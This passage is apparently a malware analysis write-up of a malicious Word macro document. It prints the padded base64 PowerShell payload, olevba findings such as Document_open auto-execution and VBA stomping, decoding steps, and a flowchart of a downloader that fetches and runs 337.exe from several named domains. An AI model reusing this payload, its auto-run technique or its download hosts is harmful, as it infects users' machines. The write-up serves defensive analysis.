772g3&*gs7712ffvs626fqB0AHAA2342772g3&*gs7712ffvs626fqOgAvAC2342772g3&*gs7712ffvs626fq8AdwB32342772g3&*gs7712ffvs626fqAHcALg2342772g3&*gs7712ffvs626fqBjAGYA2342772g3&*gs7712ffvs626fqbQAuAG2342772g3&*gs7712ffvs626fq4AbAAv2342772g3&*gs7712ffvs626fqAF8AYg2342772g3&*gs7712ffvs626fqBhAGMA2342772g3&*gs7712ffvs626fqawB1AH2342772g3&*gs7712ffvs626fqAALwB52342772g3&*gs7712ffvs626fqAGYAaA2342772g3&*gs7712ffvs626fqByAG0A2342772g3&*gs7712ffvs626fqaAA2AH2342772g3&*gs7712ffvs626fqUAMABo2342772g3&*gs7712ffvs626fqAGUAaQ2342772g3&*gs7712ffvs626fqBkAG4A2342772g3&*gs7712ffvs626fqdwByAH2342772g3&*gs7712ffvs626fqUAdwBo2342772g3&*gs7712ffvs626fqAGEAMg2342772g3&*gs7712ffvs626fqB0ADQA2342772g3&*gs7712ffvs626fqbQBqAH2342772g3&*gs7712ffvs626fqoANgBw2342772g3&*gs7712ffvs626fqAF8AeQ2342772g3&*gs7712ffvs626fqB4AGgA2342772g3&*gs7712ffvs626fqeQB1AD2342772g3&*gs7712ffvs626fqMAOQAw2342772g3&*gs7712ffvs626fqAGkANg2342772g3&*gs7712ffvs626fqBfAHEA2342772g3&*gs7712ffvs626fqOQAzAG2342772g3&*gs7712ffvs626fqgAawBo2342772g3&*gs7712ffvs626fqADMAZA2342772g3&*gs7712ffvs626fqBkAG0A2342772g3&*gs7712ffvs626fqLwAnAC2342772g3&*gs7712ffvs626fq4AIgBz2342772g3&*gs7712ffvs626fqAGAAUA2342772g3&*gs7712ffvs626fqBsAGkA2342772g3&*gs7712ffvs626fqVAAiAC2342772g3&*gs7712ffvs626fqgAWwBj2342772g3&*gs7712ffvs626fqAGgAYQ2342772g3&*gs7712ffvs626fqByAF0A2342772g3&*gs7712ffvs626fqNAAyAC2342772g3&*gs7712ffvs626fqkAOwAk2342772g3&*gs7712ffvs626fqAHMAZQ2342772g3&*gs7712ffvs626fqBjAGMA2342772g3&*gs7712ffvs626fqaQBlAH2342772g3&*gs7712ffvs626fqIAZABl2342772g3&*gs7712ffvs626fqAGUAdA2342772g3&*gs7712ffvs626fqBoAD0A2342772g3&*gs7712ffvs626fqJwBkAH2342772g3&*gs7712ffvs626fqUAdQB62342772g3&*gs7712ffvs626fqAHkAZQ2342772g3&*gs7712ffvs626fqBhAHcA2342772g3&*gs7712ffvs626fqcAB1AG2342772g3&*gs7712ffvs626fqEAcQB12342772g3&*gs7712ffvs626fqACcAOw2342772g3&*gs7712ffvs626fqBmAG8A2342772g3&*gs7712ffvs626fqcgBlAG2342772g3&*gs7712ffvs626fqEAYwBo2342772g3&*gs7712ffvs626fqACgAJA2342772g3&*gs7712ffvs626fqBnAGUA2342772g3&*gs7712ffvs626fqZQByAH2342772g3&*gs7712ffvs626fqMAaQBl2342772g3&*gs7712ffvs626fqAGIAIA2342772g3&*gs7712ffvs626fqBpAG4A2342772g3&*gs7712ffvs626fqIAAkAG2342772g3&*gs7712ffvs626fqoAYQBj2342772g3&*gs7712ffvs626fqAGwAZQ2342772g3&*gs7712ffvs626fqBlAHcA2342772g3&*gs7712ffvs626fqeQBpAH2342772g3&*gs7712ffvs626fqEAdQAp2342772g3&*gs7712ffvs626fqAHsAdA2342772g3&*gs7712ffvs626fqByAHkA2342772g3&*gs7712ffvs626fqewAkAH2342772g3&*gs7712ffvs626fqIAZQB12342772g3&*gs7712ffvs626fqAHMAdA2342772g3&*gs7712ffvs626fqBoAG8A2342772g3&*gs7712ffvs626fqYQBzAC2342772g3&*gs7712ffvs626fq4AIgBk2342772g3&*gs7712ffvs626fqAE8AVw2342772g3&*gs7712ffvs626fqBOAGAA2342772g3&*gs7712ffvs626fqbABvAE2342772g3&*gs7712ffvs626fqEAYABk2342772g3&*gs7712ffvs626fqAGYAaQ2342772g3&*gs7712ffvs626fqBgAEwA2342772g3&*gs7712ffvs626fqZQAiAC2342772g3&*gs7712ffvs626fqgAJABn2342772g3&*gs7712ffvs626fqAGUAZQ2342772g3&*gs7712ffvs626fqByAHMA2342772g3&*gs7712ffvs626fqaQBlAG2342772g3&*gs7712ffvs626fqIALAAg2342772g3&*gs7712ffvs626fqACQAdA2342772g3&*gs7712ffvs626fqBvAGUA2342772g3&*gs7712ffvs626fqaABmAG2342772g3&*gs7712ffvs626fqUAdABo2342772g3&*gs7712ffvs626fqAHgAbw2342772g3&*gs7712ffvs626fqBoAGIA2342772g3&*gs7712ffvs626fqYQBlAH2342772g3&*gs7712ffvs626fqkAKQA72342772g3&*gs7712ffvs626fqACQAYg2342772g3&*gs7712ffvs626fqB1AGgA2342772g3&*gs7712ffvs626fqeABlAH2342772g3&*gs7712ffvs626fqUAaAA92342772g3&*gs7712ffvs626fqACcAZA2342772g3&*gs7712ffvs626fqBvAGUA2342772g3&*gs7712ffvs626fqeQBkAG2342772g3&*gs7712ffvs626fqUAaQBk2342772g3&*gs7712ffvs626fqAHEAdQ2342772g3&*gs7712ffvs626fqBhAGkA2342772g3&*gs7712ffvs626fqagBsAG2342772g3&*gs7712ffvs626fqUAdQBj2342772g3&*gs7712ffvs626fqACcAOw2342772g3&*gs7712ffvs626fqBJAGYA2342772g3&*gs7712ffvs626fqIAAoAC2342772g3&*gs7712ffvs626fqgALgAo2342772g3&*gs7712ffvs626fqACcARw2342772g3&*gs7712ffvs626fqBlAHQA2342772g3&*gs7712ffvs626fqLQAnAC2342772g3&*gs7712ffvs626fqsAJwBJ2342772g3&*gs7712ffvs626fqAHQAZQ2342772g3&*gs7712ffvs626fqAnACsA2342772g3&*gs7712ffvs626fqJwBtAC2342772g3&*gs7712ffvs626fqcAKQAg2342772g3&*gs7712ffvs626fqACQAdA2342772g3&*gs7712ffvs626fqBvAGUA2342772g3&*gs7712ffvs626fqaABmAG2342772g3&*gs7712ffvs626fqUAdABo2342772g3&*gs7712ffvs626fqAHgAbw2342772g3&*gs7712ffvs626fqBoAGIA2342772g3&*gs7712ffvs626fqYQBlAH2342772g3&*gs7712ffvs626fqkAKQAu2342772g3&*gs7712ffvs626fqACIAbA2342772g3&*gs7712ffvs626fqBgAGUA2342772g3&*gs7712ffvs626fqTgBHAF2342772g3&*gs7712ffvs626fqQASAAi2342772g3&*gs7712ffvs626fqACAALQ2342772g3&*gs7712ffvs626fqBnAGUA2342772g3&*gs7712ffvs626fqIAAyAD2342772g3&*gs7712ffvs626fqQANwA12342772g3&*gs7712ffvs626fqADEAKQ2342772g3&*gs7712ffvs626fqAgAHsA2342772g3&*gs7712ffvs626fqKABbAH2342772g3&*gs7712ffvs626fqcAbQBp2342772g3&*gs7712ffvs626fqAGMAbA2342772g3&*gs7712ffvs626fqBhAHMA2342772g3&*gs7712ffvs626fqcwBdAC2342772g3&*gs7712ffvs626fqcAdwBp2342772g3&*gs7712ffvs626fqAG4AMw2342772g3&*gs7712ffvs626fqAyAF8A2342772g3&*gs7712ffvs626fqUAByAG2342772g3&*gs7712ffvs626fq8AYwBl2342772g3&*gs7712ffvs626fqAHMAcw2342772g3&*gs7712ffvs626fqAnACkA2342772g3&*gs7712ffvs626fqLgAiAE2342772g3&*gs7712ffvs626fqMAYABS2342772g3&*gs7712ffvs626fqAGUAYQ2342772g3&*gs7712ffvs626fqBUAGUA2342772g3&*gs7712ffvs626fqIgAoAC2342772g3&*gs7712ffvs626fqQAdABv2342772g3&*gs7712ffvs626fqAGUAaA2342772g3&*gs7712ffvs626fqBmAGUA2342772g3&*gs7712ffvs626fqdABoAH2342772g3&*gs7712ffvs626fqgAbwBo2342772g3&*gs7712ffvs626fqAGIAYQ2342772g3&*gs7712ffvs626fqBlAHkA2342772g3&*gs7712ffvs626fqKQA7AC2342772g3&*gs7712ffvs626fqQAcQB12342772g3&*gs7712ffvs626fqAG8Abw2342772g3&*gs7712ffvs626fqBkAHQA2342772g3&*gs7712ffvs626fqZQBlAG2342772g3&*gs7712ffvs626fqgAPQAn2342772g3&*gs7712ffvs626fqAGoAaQ2342772g3&*gs7712ffvs626fqBhAGYA2342772g3&*gs7712ffvs626fqcgB1AH2342772g3&*gs7712ffvs626fqUAegBs2342772g3&*gs7712ffvs626fqAGEAbw2342772g3&*gs7712ffvs626fqBsAHQA2342772g3&*gs7712ffvs626fqaABvAG2342772g3&*gs7712ffvs626fqkAYwAn2342772g3&*gs7712ffvs626fqADsAYg2342772g3&*gs7712ffvs626fqByAGUA2342772g3&*gs7712ffvs626fqYQBrAD2342772g3&*gs7712ffvs626fqsAJABj2342772g3&*gs7712ffvs626fqAGgAaQ2342772g3&*gs7712ffvs626fqBnAGMA2342772g3&*gs7712ffvs626fqaABpAG2342772g3&*gs7712ffvs626fqUAbgB02342772g3&*gs7712ffvs626fqAGUAaQ2342772g3&*gs7712ffvs626fqBxAHUA2342772g3&*gs7712ffvs626fqPQAnAH2342772g3&*gs7712ffvs626fqkAbwBv2342772g3&*gs7712ffvs626fqAHcAdg2342772g3&*gs7712ffvs626fqBlAGkA2342772g3&*gs7712ffvs626fqaABuAG2342772g3&*gs7712ffvs626fqkAZQBq2342772g3&*gs7712ffvs626fqACcAfQ2342772g3&*gs7712ffvs626fqB9AGMA2342772g3&*gs7712ffvs626fqYQB0AG2342772g3&*gs7712ffvs626fqMAaAB72342772g3&*gs7712ffvs626fqAH0AfQ2342772g3&*gs7712ffvs626fqAkAHQA2342772g3&*gs7712ffvs626fqbwBpAH2342772g3&*gs7712ffvs626fqoAbAB12342772g3&*gs7712ffvs626fqAHUAbA2342772g3&*gs7712ffvs626fqBmAGkA2342772g3&*gs7712ffvs626fqZQByAD2342772g3&*gs7712ffvs626fq0AJwBm2342772g3&*gs7712ffvs626fqAG8AcQ2342772g3&*gs7712ffvs626fqB1AGwA2342772g3&*gs7712ffvs626fqZQB2AG2342772g3&*gs7712ffvs626fqMAYQBv2342772g3&*gs7712ffvs626fqAGoAJw2342772g3&*gs7712ffvs626fqA=
-------------------------------------------------------------------------------
VBA FORM STRING IN 'sample.bin' - OLE stream: 'Macros/roubhaol/i09/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
�Tab3
-------------------------------------------------------------------------------
VBA FORM STRING IN 'sample.bin' - OLE stream: 'Macros/roubhaol/i09/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
�Tab4
-------------------------------------------------------------------------------
VBA FORM Variable "b'meetcuac'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'joopxof'
-------------------------------------------------------------------------------
VBA FORM Variable "b'dechxoz'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'caorfauxleir'
-------------------------------------------------------------------------------
VBA FORM Variable "b'joefwoefcheaw'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'P'
-------------------------------------------------------------------------------
VBA FORM Variable "b'teehkaifxoodthiv'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'foewdaibzian'
-------------------------------------------------------------------------------
VBA FORM Variable "b'paerwagyouqumeid'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
None
-------------------------------------------------------------------------------
VBA FORM Variable "b'taowseuvjeip'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
None
-------------------------------------------------------------------------------
VBA FORM Variable "b'kaizseah'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
None
-------------------------------------------------------------------------------
VBA FORM Variable "b'gegheyhes'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'yoewcheuypouc'
-------------------------------------------------------------------------------
VBA FORM Variable "b'gaoddaicsauktheb'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
None
-------------------------------------------------------------------------------
VBA FORM Variable "b'vuazleelxeep'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'duuhfeupniwboh'
-------------------------------------------------------------------------------
VBA FORM Variable "None" IN 'sample.bin' - OLE stream: 'Macros/roubhaol/i09'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
None
-------------------------------------------------------------------------------
VBA FORM Variable "b'Page1'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol/i09'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
None
-------------------------------------------------------------------------------
VBA FORM Variable "b'Page2'" IN 'sample.bin' - OLE stream: 'Macros/roubhaol/i09'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
None
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Document_open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|Suspicious|Create              |May execute file or a system command through |
|          |                    |WMI                                          |
|Suspicious|showwindow          |May hide the application                     |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Hex String|2#Bw                |32234277                                     |
|Hex String|J#Bw                |4A234277                                     |
|Hex String|#Bw                 |0A234277                                     |
|Suspicious|VBA Stomping        |VBA Stomping was detected: the VBA source    |
|          |                    |code and P-code are different, this may have |
|          |                    |been used to hide malicious code             |
+----------+--------------------+---------------------------------------------+
VBA Stomping detection is experimental: please report any false positive/negative at https://github.com/decalage2/oletools/issues

...
|AutoExec  |Document_open       |Runs when the Word or Publisher document is  |
...

The Document_open event is a VBA trigger that automatically executes when a document is opened. This functionality is commonly exploited by attackers to initiate malicious code as soon as the victim opens the document. By leveraging this event, the malicious macro doesn’t require any manual action from the user, such as clicking a button, making it an effective initial attack vector.

Additionally, the analysis output highlights other suspicious activities, such as the use of commands to create objects, manipulate strings, or decode Base64-encoded data. These are red flags often associated with malicious behavior in VBA macros.

Analyzing stream

The stream Macros/roubhaol/i09/o is storing a base64-encoded string with obfuscated, and it stands out due to the amount of content it has.

Obfuscation: Binary Padding

The adversaries use this technique to add junk data and adjust the on-disk representation of malware. Read more

The obfuscation in this artifact is a repetition string that create space between each character, removing them reveal the full malicious script that it ran. In such case, CyberChef with Find / Replace and From base64 operations would be useful. The repetition is `2342772g3&*gs7712ffvs626fq:

Remove null bytes and add line break, I ended up with this:

Flowchart

graph TD
    A[Word Document Opened] --> B[Triggers Document_open]
    B --> C[Calls boaxvoebxiotqueb]
    C --> D[Builds WMI String]
    D -->|Deobfuscates| E(“winmgmts:win32_Process”)
    C --> F[Extracts Payload from ControlTipText]
    F -->|Deobfuscates| G[Base64 PowerShell Script]
    C --> H[Creates WMI Object]
    H --> I[Executes PowerShell]

    I --> J[Set TLS Protocols]
    J --> K[Define Payload Path]
    K -->|%USERPROFILE%| L[337.exe]
    I --> M[Define URLs]
    M --> N[“haoqunkong.com<br/>techtravel.events<br/>digiwebmarketing.com<br/>holfve.se<br/>cfm.nl”]
    
    I --> O[Loop Through URLs]
    O --> P{Download Successful?}
    P -->|Yes| Q[Check File Size ≥ 24751 bytes]
    P -->|No| O[Try Next URL]
    Q -->|Valid| R[Execute via WMI]
    Q -->|Invalid| O[Try Next URL]
    R --> S[Run Malware Payload]